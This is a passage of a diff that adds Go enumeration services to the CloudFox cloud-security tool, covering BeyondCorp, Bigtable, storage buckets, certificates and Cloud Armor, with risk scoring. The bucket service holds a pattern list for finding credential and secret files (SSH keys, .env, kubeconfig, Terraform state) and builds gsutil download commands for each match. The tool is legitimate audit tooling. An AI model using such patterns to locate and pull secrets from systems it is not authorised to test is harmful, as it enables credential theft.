AppConnectionInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + Type string `json:"type"` + ApplicationEndpoint string `json:"applicationEndpoint"` + Connectors []string `json:"connectors"` + Gateway string `json:"gateway"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListAppConnectors retrieves all BeyondCorp app connectors +func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorInfo, error) { + ctx := context.Background() + var service *beyondcorp.Service + var err error + + if s.session != nil { + service, err = beyondcorp.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = beyondcorp.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create BeyondCorp service: %v", err) + } + + var connectors []AppConnectorInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.AppConnectors.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1ListAppConnectorsResponse) error { + for _, connector := range page.AppConnectors { + info := s.parseAppConnector(connector, projectID) + connectors = append(connectors, info) + } + return nil + }) + if err != nil { + // API might not be enabled + return connectors, nil + } + + return connectors, nil +} + +// ListAppConnections retrieves all BeyondCorp app connections +func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectionInfo, error) { + ctx := context.Background() + var service *beyondcorp.Service + var err error + + if s.session != nil { + service, err = beyondcorp.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = beyondcorp.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create BeyondCorp service: %v", err) + } + + var connections []AppConnectionInfo + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.AppConnections.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1ListAppConnectionsResponse) error { + for _, conn := range page.AppConnections { + info := s.parseAppConnection(conn, projectID) + connections = append(connections, info) + } + return nil + }) + if err != nil { + return connections, nil + } + + return connections, nil +} + +func (s *BeyondCorpService) parseAppConnector(connector *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1AppConnector, projectID string) AppConnectorInfo { + info := AppConnectorInfo{ + Name: extractName(connector.Name), + ProjectID: projectID, + Location: extractLocation(connector.Name), + DisplayName: connector.DisplayName, + State: connector.State, + CreateTime: connector.CreateTime, + UpdateTime: connector.UpdateTime, + RiskReasons: []string{}, + } + + if connector.PrincipalInfo != nil && connector.PrincipalInfo.ServiceAccount != nil { + info.PrincipalInfo = connector.PrincipalInfo.ServiceAccount.Email + } + + if connector.ResourceInfo != nil { + info.ResourceInfo = connector.ResourceInfo.Id + } + + info.RiskLevel, info.RiskReasons = s.analyzeConnectorRisk(info) + + return info +} + +func (s *BeyondCorpService) parseAppConnection(conn *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1AppConnection, projectID string) AppConnectionInfo { + info := AppConnectionInfo{ + Name: extractName(conn.Name), + ProjectID: projectID, + Location: extractLocation(conn.Name), + DisplayName: conn.DisplayName, + State: conn.State, + Type: conn.Type, + CreateTime: conn.CreateTime, + UpdateTime: conn.UpdateTime, + RiskReasons: []string{}, + } + + if conn.ApplicationEndpoint != nil { + info.ApplicationEndpoint = fmt.Sprintf("%s:%d", conn.ApplicationEndpoint.Host, conn.ApplicationEndpoint.Port) + } + + for _, connector := range conn.Connectors { + info.Connectors = append(info.Connectors, extractName(connector)) + } + + if conn.Gateway != nil { + info.Gateway = extractName(conn.Gateway.AppGateway) + } + + info.RiskLevel, info.RiskReasons = s.analyzeConnectionRisk(info) + + return info +} + +func (s *BeyondCorpService) analyzeConnectorRisk(connector AppConnectorInfo) (string, []string) { + var reasons []string + score := 0 + + if connector.State != "RUNNING" { + reasons = append(reasons, fmt.Sprintf("Connector not running: %s", connector.State)) + score += 1 + } + + if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *BeyondCorpService) analyzeConnectionRisk(conn AppConnectionInfo) (string, []string) { + var reasons []string + score := 0 + + // Connection to sensitive ports + if strings.Contains(conn.ApplicationEndpoint, ":22") { + reasons = append(reasons, "Connection to SSH port (22)") + score += 1 + } + if strings.Contains(conn.ApplicationEndpoint, ":3389") { + reasons = append(reasons, "Connection to RDP port (3389)") + score += 1 + } + + if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractLocation(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/bigtableService/bigtableService.go b/gcp/services/bigtableService/bigtableService.go new file mode 100644 index 00000000..fbcceb32 --- /dev/null +++ b/gcp/services/bigtableService/bigtableService.go @@ -0,0 +1,94 @@ +package bigtableservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" +) + +type BigtableService struct { + session *gcpinternal.SafeSession +} + +func New() *BigtableService { + return &BigtableService{} +} + +type BigtableInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Type string `json:"type"` + State string `json:"state"` + Tables []string `json:"tables"` + Clusters []ClusterInfo `json:"clusters"` +} + +type ClusterInfo struct { + Name string `json:"name"` + Location string `json:"location"` + ServeNodes int64 `json:"serveNodes"` + State string `json:"state"` +} + +func (s *BigtableService) ListInstances(projectID string) ([]BigtableInstanceInfo, error) { + ctx := context.Background() + service, err := bigtableadmin.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Bigtable Admin service: %v", err) + } + + var instances []BigtableInstanceInfo + parent := fmt.Sprintf("projects/%s", projectID) + + resp, err := service.Projects.Instances.List(parent).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, instance := range resp.Instances { + info := BigtableInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + DisplayName: instance.DisplayName, + Type: instance.Type, + State: instance.State, + } + + // Get clusters + clustersResp, _ := service.Projects.Instances.Clusters.List(instance.Name).Context(ctx).Do() + if clustersResp != nil { + for _, cluster := range clustersResp.Clusters { + info.Clusters = append(info.Clusters, ClusterInfo{ + Name: extractName(cluster.Name), + Location: cluster.Location, + ServeNodes: cluster.ServeNodes, + State: cluster.State, + }) + } + } + + // Get tables + tablesResp, _ := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() + if tablesResp != nil { + for _, table := range tablesResp.Tables { + info.Tables = append(info.Tables, extractName(table.Name)) + } + } + + instances = append(instances, info) + } + + return instances, nil +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go new file mode 100644 index 00000000..d33d3210 --- /dev/null +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -0,0 +1,278 @@ +package bucketenumservice + +import ( + "context" + "fmt" + "path/filepath" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/iterator" + "google.golang.org/api/storage/v1" +) + +type BucketEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BucketEnumService { + return &BucketEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BucketEnumService { + return &BucketEnumService{session: session} +} + +// SensitiveFileInfo represents a potentially sensitive file in a bucket +type SensitiveFileInfo struct { + BucketName string `json:"bucketName"` + ObjectName string `json:"objectName"` + ProjectID string `json:"projectId"` + Size int64 `json:"size"` + ContentType string `json:"contentType"` + Category string `json:"category"` // credential, secret, config, backup, etc. + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + Description string `json:"description"` // Why it's sensitive + DownloadCmd string `json:"downloadCmd"` // gsutil command to download + Updated string `json:"updated"` + StorageClass string `json:"storageClass"` +} + +// SensitivePatterns defines patterns to search for sensitive files +type SensitivePattern struct { + Pattern string + Category string + RiskLevel string + Description string +} + +// GetSensitivePatterns returns all patterns to check for sensitive files +func GetSensitivePatterns() []SensitivePattern { + return []SensitivePattern{ + // Credentials - CRITICAL + {Pattern: ".json", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key file"}, + {Pattern: "credentials.json", Category: "Credential", RiskLevel: "CRITICAL", Description: "GCP credentials file"}, + {Pattern: "service-account", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key"}, + {Pattern: "keyfile", Category: "Credential", RiskLevel: "CRITICAL", Description: "Key file"}, + {Pattern: ".pem", Category: "Credential", RiskLevel: "CRITICAL", Description: "PEM private key"}, + {Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key file"}, + {Pattern: ".p12", Category: "Credential", RiskLevel: "CRITICAL", Description: "PKCS12 key file"}, + {Pattern: ".pfx", Category: "Credential", RiskLevel: "CRITICAL", Description: "PFX certificate file"}, + {Pattern: "id_rsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key"}, + {Pattern: "id_ed25519", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ed25519)"}, + {Pattern: "id_ecdsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ECDSA)"}, + + // Secrets - CRITICAL/HIGH + {Pattern: ".env", Category: "Secret", RiskLevel: "CRITICAL", Description: "Environment variables (may contain secrets)"}, + {Pattern: "secrets", Category: "Secret", RiskLevel: "HIGH", Description: "Secrets file or directory"}, + {Pattern: "password", Category: "Secret", RiskLevel: "HIGH", Description: "Password file"}, + {Pattern: "api_key", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "apikey", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "token", Category: "Secret", RiskLevel: "HIGH", Description: "Token file"}, + {Pattern: "auth", Category: "Secret", RiskLevel: "HIGH", Description: "Authentication file"}, + {Pattern: ".htpasswd", Category: "Secret", RiskLevel: "HIGH", Description: "HTTP password file"}, + {Pattern: ".netrc", Category: "Secret", RiskLevel: "HIGH", Description: "FTP/other credentials"}, + + // Config files - HIGH/MEDIUM + {Pattern: "config", Category: "Config", RiskLevel: "MEDIUM", Description: "Configuration file"}, + {Pattern: ".yaml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: ".yml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: "application.properties", Category: "Config", RiskLevel: "HIGH", Description: "Java app config"}, + {Pattern: "web.config", Category: "Config", RiskLevel: "HIGH", Description: ".NET config"}, + {Pattern: "appsettings.json", Category: "Config", RiskLevel: "HIGH", Description: ".NET app settings"}, + {Pattern: "settings.py", Category: "Config", RiskLevel: "HIGH", Description: "Django settings"}, + {Pattern: "database.yml", Category: "Config", RiskLevel: "HIGH", Description: "Rails database config"}, + {Pattern: "wp-config.php", Category: "Config", RiskLevel: "HIGH", Description: "WordPress config"}, + {Pattern: ".npmrc", Category: "Config", RiskLevel: "HIGH", Description: "NPM config (may contain tokens)"}, + {Pattern: ".dockercfg", Category: "Config", RiskLevel: "HIGH", Description: "Docker registry credentials"}, + {Pattern: "docker-compose", Category: "Config", RiskLevel: "MEDIUM", Description: "Docker compose config"}, + {Pattern: "terraform.tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state (contains secrets)"}, + {Pattern: ".tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state file"}, + {Pattern: "terraform.tfvars", Category: "Config", RiskLevel: "HIGH", Description: "Terraform variables"}, + {Pattern: "kubeconfig", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + {Pattern: ".kube/config", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + + // Backups - HIGH + {Pattern: ".sql", Category: "Backup", RiskLevel: "HIGH", Description: "SQL database dump"}, + {Pattern: ".dump", Category: "Backup", RiskLevel: "HIGH", Description: "Database dump"}, + {Pattern: ".bak", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file"}, + {Pattern: "backup", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file/directory"}, + {Pattern: ".tar.gz", Category: "Backup", RiskLevel: "MEDIUM", Description: "Compressed archive"}, + {Pattern: ".zip", Category: "Backup", RiskLevel: "MEDIUM", Description: "ZIP archive"}, + + // Source code - MEDIUM + {Pattern: ".git", Category: "Source", RiskLevel: "MEDIUM", Description: "Git repository data"}, + {Pattern: "source", Category: "Source", RiskLevel: "LOW", Description: "Source code"}, + + // Logs - LOW (but may contain sensitive data) + {Pattern: ".log", Category: "Log", RiskLevel: "LOW", Description: "Log file (may contain sensitive data)"}, + {Pattern: "access.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Access log"}, + {Pattern: "error.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Error log"}, + + // Cloud-specific + {Pattern: "cloudfunctions", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source"}, + {Pattern: "gcf-sources", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source bucket"}, + {Pattern: "cloud-build", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Build artifacts"}, + {Pattern: "artifacts", Category: "Cloud", RiskLevel: "LOW", Description: "Build artifacts"}, + } +} + +// EnumerateBucketSensitiveFiles lists potentially sensitive files in a bucket +func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID string, maxObjects int) ([]SensitiveFileInfo, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create storage service: %v", err) + } + + var sensitiveFiles []SensitiveFileInfo + patterns := GetSensitivePatterns() + + // List objects in the bucket + req := storageService.Objects.List(bucketName) + if maxObjects > 0 { + req = req.MaxResults(int64(maxObjects)) + } + + err = req.Pages(ctx, func(objects *storage.Objects) error { + for _, obj := range objects.Items { + // Check against sensitive patterns + if info := s.checkObjectSensitivity(obj, bucketName, projectID, patterns); info != nil { + sensitiveFiles = append(sensitiveFiles, *info) + } + } + return nil + }) + + if err != nil && err != iterator.Done { + return nil, fmt.Errorf("failed to list objects: %v", err) + } + + return sensitiveFiles, nil +} + +func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketName, projectID string, patterns []SensitivePattern) *SensitiveFileInfo { + if obj == nil { + return nil + } + + name := strings.ToLower(obj.Name) + ext := strings.ToLower(filepath.Ext(obj.Name)) + baseName := strings.ToLower(filepath.Base(obj.Name)) + + // Check each pattern + for _, pattern := range patterns { + matched := false + patternLower := strings.ToLower(pattern.Pattern) + + // Check extension match + if strings.HasPrefix(patternLower, ".") && ext == patternLower { + matched = true + } + // Check name contains pattern + if strings.Contains(name, patternLower) { + matched = true + } + // Check base name match + if strings.Contains(baseName, patternLower) { + matched = true + } + + if matched { + // Additional filtering for common false positives + if s.isFalsePositive(obj.Name, pattern) { + continue + } + + return &SensitiveFileInfo{ + BucketName: bucketName, + ObjectName: obj.Name, + ProjectID: projectID, + Size: int64(obj.Size), + ContentType: obj.ContentType, + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + Updated: obj.Updated, + StorageClass: obj.StorageClass, + } + } + } + + return nil +} + +func (s *BucketEnumService) isFalsePositive(objectName string, pattern SensitivePattern) bool { + nameLower := strings.ToLower(objectName) + + // Filter out common false positives + falsePositivePaths := []string{ + "node_modules/", + "vendor/", + ".git/objects/", + "__pycache__/", + "dist/", + "build/", + } + + for _, fp := range falsePositivePaths { + if strings.Contains(nameLower, fp) { + return true + } + } + + // JSON files that are likely not credentials + if pattern.Pattern == ".json" { + // Only flag if it looks like a service account or credential + if !strings.Contains(nameLower, "service") && + !strings.Contains(nameLower, "account") && + !strings.Contains(nameLower, "credential") && + !strings.Contains(nameLower, "key") && + !strings.Contains(nameLower, "secret") && + !strings.Contains(nameLower, "auth") { + return true + } + } + + // Filter very small files (likely empty or not useful) + // This would need to be checked at the object level + + return false +} + +// GetBucketsList lists all buckets in a project +func (s *BucketEnumService) GetBucketsList(projectID string) ([]string, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create storage service: %v", err) + } + + var buckets []string + err = storageService.Buckets.List(projectID).Pages(ctx, func(bucketList *storage.Buckets) error { + for _, bucket := range bucketList.Items { + buckets = append(buckets, bucket.Name) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list buckets: %v", err) + } + + return buckets, nil +} diff --git a/gcp/services/certManagerService/certManagerService.go b/gcp/services/certManagerService/certManagerService.go new file mode 100644 index 00000000..1be87a2d --- /dev/null +++ b/gcp/services/certManagerService/certManagerService.go @@ -0,0 +1,355 @@ +package certmanagerservice + +import ( + "context" + "fmt" + "strings" + "time" + + certificatemanager "google.golang.org/api/certificatemanager/v1" + compute "google.golang.org/api/compute/v1" +) + +type CertManagerService struct{} + +func New() *CertManagerService { + return &CertManagerService{} +} + +// Certificate represents an SSL/TLS certificate +type Certificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // SELF_MANAGED, GOOGLE_MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + State string `json:"state"` + IssuanceState string `json:"issuanceState"` + AttachedTo []string `json:"attachedTo"` // LBs or other resources + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// SSLCertificate represents a compute SSL certificate (classic) +type SSLCertificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // SELF_MANAGED, MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + CreationTime string `json:"creationTime"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// CertificateMap represents a Certificate Manager certificate map +type CertificateMap struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + EntryCount int `json:"entryCount"` + Certificates []string `json:"certificates"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// GetCertificates retrieves Certificate Manager certificates +func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, error) { + ctx := context.Background() + service, err := certificatemanager.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create certificate manager service: %v", err) + } + + var certificates []Certificate + + // List certificates in all locations (global and regional) + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.Certificates.List(parent).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no certificates + } + + for _, cert := range resp.Certificates { + c := Certificate{ + Name: extractNameFromPath(cert.Name), + ProjectID: projectID, + Location: location, + Domains: cert.SanDnsnames, + RiskReasons: []string{}, + } + + // Determine type and state + if cert.Managed != nil { + c.Type = "GOOGLE_MANAGED" + c.State = cert.Managed.State + c.IssuanceState = cert.Managed.State + } else if cert.SelfManaged != nil { + c.Type = "SELF_MANAGED" + c.State = "ACTIVE" // Self-managed certs are active if they exist + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + } + } + + // Analyze risk + c.RiskLevel, c.RiskReasons = s.analyzeCertRisk(c) + + certificates = append(certificates, c) + } + } + + return certificates, nil +} + +// GetSSLCertificates retrieves classic Compute Engine SSL certificates +func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertificate, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %v", err) + } + + var certificates []SSLCertificate + + // Global SSL certificates + resp, err := service.SslCertificates.List(projectID).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to list SSL certificates: %v", err) + } + + for _, cert := range resp.Items { + c := SSLCertificate{ + Name: cert.Name, + ProjectID: projectID, + Type: cert.Type, + CreationTime: cert.CreationTimestamp, + RiskReasons: []string{}, + } + + // Get domains from managed certificate + if cert.Managed != nil { + c.Domains = cert.Managed.Domains + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + } + } + + // Analyze risk + c.RiskLevel, c.RiskReasons = s.analyzeSSLCertRisk(c) + + certificates = append(certificates, c) + } + + // Regional SSL certificates + regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() + if err == nil { + for _, region := range regionsResp.Items { + regionalCerts, err := service.RegionSslCertificates.List(projectID, region.Name).Context(ctx).Do() + if err != nil { + continue + } + + for _, cert := range regionalCerts.Items { + c := SSLCertificate{ + Name: fmt.Sprintf("%s (%s)", cert.Name, region.Name), + ProjectID: projectID, + Type: cert.Type, + CreationTime: cert.CreationTimestamp, + RiskReasons: []string{}, + } + + if cert.Managed != nil { + c.Domains = cert.Managed.Domains + } + + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + } + } + + c.RiskLevel, c.RiskReasons = s.analyzeSSLCertRisk(c) + certificates = append(certificates, c) + } + } + } + + return certificates, nil +} + +// GetCertificateMaps retrieves certificate maps +func (s *CertManagerService) GetCertificateMaps(projectID string) ([]CertificateMap, error) { + ctx := context.Background() + service, err := certificatemanager.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create certificate manager service: %v", err) + } + + var maps []CertificateMap + + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.CertificateMaps.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, certMap := range resp.CertificateMaps { + cm := CertificateMap{ + Name: extractNameFromPath(certMap.Name), + ProjectID: projectID, + Location: location, + RiskReasons: []string{}, + } + + // Get entries for this map + entriesResp, err := service.Projects.Locations.CertificateMaps.CertificateMapEntries.List(certMap.Name).Context(ctx).Do() + if err == nil { + cm.EntryCount = len(entriesResp.CertificateMapEntries) + for _, entry := range entriesResp.CertificateMapEntries { + for _, certRef := range entry.Certificates { + cm.Certificates = append(cm.Certificates, extractNameFromPath(certRef)) + } + } + } + + cm.RiskLevel, cm.RiskReasons = s.analyzeMapRisk(cm) + maps = append(maps, cm) + } + } + + return maps, nil +} + +func (s *CertManagerService) analyzeCertRisk(cert Certificate) (string, []string) { + var reasons []string + score := 0 + + // Check expiration + if cert.DaysUntilExpiry < 0 { + reasons = append(reasons, "Certificate has EXPIRED!") + score += 3 + } else if cert.DaysUntilExpiry <= 7 { + reasons = append(reasons, fmt.Sprintf("Certificate expires in %d day(s) - CRITICAL", cert.DaysUntilExpiry)) + score += 2 + } else if cert.DaysUntilExpiry <= 30 { + reasons = append(reasons, fmt.Sprintf("Certificate expires in %d day(s)", cert.DaysUntilExpiry)) + score += 1 + } + + // Check state + if cert.State == "FAILED" { + reasons = append(reasons, "Certificate in FAILED state") + score += 2 + } + + // Check issuance state for managed certs + if cert.Type == "GOOGLE_MANAGED" && cert.IssuanceState != "ACTIVE" { + reasons = append(reasons, fmt.Sprintf("Managed certificate issuance state: %s", cert.IssuanceState)) + score += 1 + } + + // Self-managed certs need more attention + if cert.Type == "SELF_MANAGED" { + reasons = append(reasons, "Self-managed certificate requires manual renewal") + } + + // Check for wildcard domains (can be abused if key is compromised) + for _, domain := range cert.Domains { + if strings.HasPrefix(domain, "*") { + reasons = append(reasons, fmt.Sprintf("Wildcard certificate: %s", domain)) + break + } + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *CertManagerService) analyzeSSLCertRisk(cert SSLCertificate) (string, []string) { + var reasons []string + score := 0 + + // Check expiration + if cert.DaysUntilExpiry < 0 { + reasons = append(reasons, "Certificate has EXPIRED!") + score += 3 + } else if cert.DaysUntilExpiry <= 7 { + reasons = append(reasons, fmt.Sprintf("Certificate expires in %d day(s) - CRITICAL", cert.DaysUntilExpiry)) + score += 2 + } else if cert.DaysUntilExpiry <= 30 { + reasons = append(reasons, fmt.Sprintf("Certificate expires in %d day(s)", cert.DaysUntilExpiry)) + score += 1 + } + + // Self-managed needs more attention + if cert.Type == "SELF_MANAGED" { + reasons = append(reasons, "Self-managed certificate requires manual renewal") + } + + // Check for wildcard + for _, domain := range cert.Domains { + if strings.HasPrefix(domain, "*") { + reasons = append(reasons, fmt.Sprintf("Wildcard certificate: %s", domain)) + break + } + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *CertManagerService) analyzeMapRisk(certMap CertificateMap) (string, []string) { + var reasons []string + + if certMap.EntryCount == 0 { + reasons = append(reasons, "Certificate map has no entries") + return "LOW", reasons + } + + reasons = append(reasons, fmt.Sprintf("Has %d certificate(s)", len(certMap.Certificates))) + return "INFO", reasons +} + +func extractNameFromPath(path string) string { + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} diff --git a/gcp/services/cloudArmorService/cloudArmorService.go b/gcp/services/cloudArmorService/cloudArmorService.go new file mode 100644 index 00000000..0892e550 --- /dev/null +++ b/gcp/services/cloudArmorService/cloudArmorService.go @@ -0,0 +1,286 @@ +package cloudarmorservice + +import ( + "context" + "fmt" + "strings" + + compute "google.golang.org/api/compute/v1" +) + +type CloudArmorService struct{} + +func New() *CloudArmorService { + return &CloudArmorService{} +} + +// SecurityPolicy represents a Cloud Armor security policy +type SecurityPolicy struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + Type string `json:"type"` // CLOUD_ARMOR, CLOUD_ARMOR_EDGE, CLOUD_ARMOR_NETWORK + RuleCount int `json:"ruleCount"` + Rules []SecurityRule `json:"rules"` + AdaptiveProtection bool `json:"adaptiveProtection"` + DDOSProtection string `json:"ddosProtection"` + AttachedResources []string `json:"attachedResources"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + Weaknesses []string `json:"weaknesses"` +} + +// SecurityRule represents a rule within a security policy +type SecurityRule struct { + Priority int64 `json:"priority"` + Description string `json:"description"` + Action string `json:"action"` // allow, deny, redirect, rate_based_ban, throttle + Match string `json:"match"` // Simplified match expression + Preview bool `json:"preview"` + RateLimitConfig *RateLimitInfo `json:"rateLimitConfig,omitempty"` +} + +// RateLimitInfo contains rate limiting configuration +type RateLimitInfo struct { + ThresholdCount int64 `json:"thresholdCount"` + IntervalSec int64 `json:"intervalSec"` + ExceedAction string `json:"exceedAction"` +} + +// GetSecurityPolicies retrieves all Cloud Armor security policies +func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPolicy, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %v", err) + } + + var policies []SecurityPolicy + + // List security policies + resp, err := service.SecurityPolicies.List(projectID).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to list security policies: %v", err) + } + + for _, policy := range resp.Items { + sp := SecurityPolicy{ + Name: policy.Name, + ProjectID: projectID, + Description: policy.Description, + Type: policy.Type, + RuleCount: len(policy.Rules), + Rules: []SecurityRule{}, + AttachedResources: []string{}, + RiskReasons: []string{}, + Weaknesses: []string{}, + } + + // Check adaptive protection + if policy.AdaptiveProtectionConfig != nil && + policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig != nil { + sp.AdaptiveProtection = policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig.Enable + } + + // Check DDoS protection + if policy.DdosProtectionConfig != nil { + sp.DDOSProtection = policy.DdosProtectionConfig.DdosProtection + } + + // Parse rules + for _, rule := range policy.Rules { + sr := SecurityRule{ + Priority: rule.Priority, + Description: rule.Description, + Action: rule.Action, + Preview: rule.Preview, + } + + // Parse match expression + if rule.Match != nil { + if rule.Match.Expr != nil { + sr.Match = rule.Match.Expr.Expression + } else if rule.Match.VersionedExpr != "" { + sr.Match = rule.Match.VersionedExpr + } else if rule.Match.Config != nil { + // Source IP ranges + if len(rule.Match.Config.SrcIpRanges) > 0 { + sr.Match = fmt.Sprintf("srcIpRanges: %s", strings.Join(rule.Match.Config.SrcIpRanges, ", ")) + } + } + } + + // Rate limit config + if rule.RateLimitOptions != nil { + sr.RateLimitConfig = &RateLimitInfo{ + ExceedAction: rule.RateLimitOptions.ExceedAction, + } + if rule.RateLimitOptions.RateLimitThreshold != nil { + sr.RateLimitConfig.ThresholdCount = rule.RateLimitOptions.RateLimitThreshold.Count + sr.RateLimitConfig.IntervalSec = 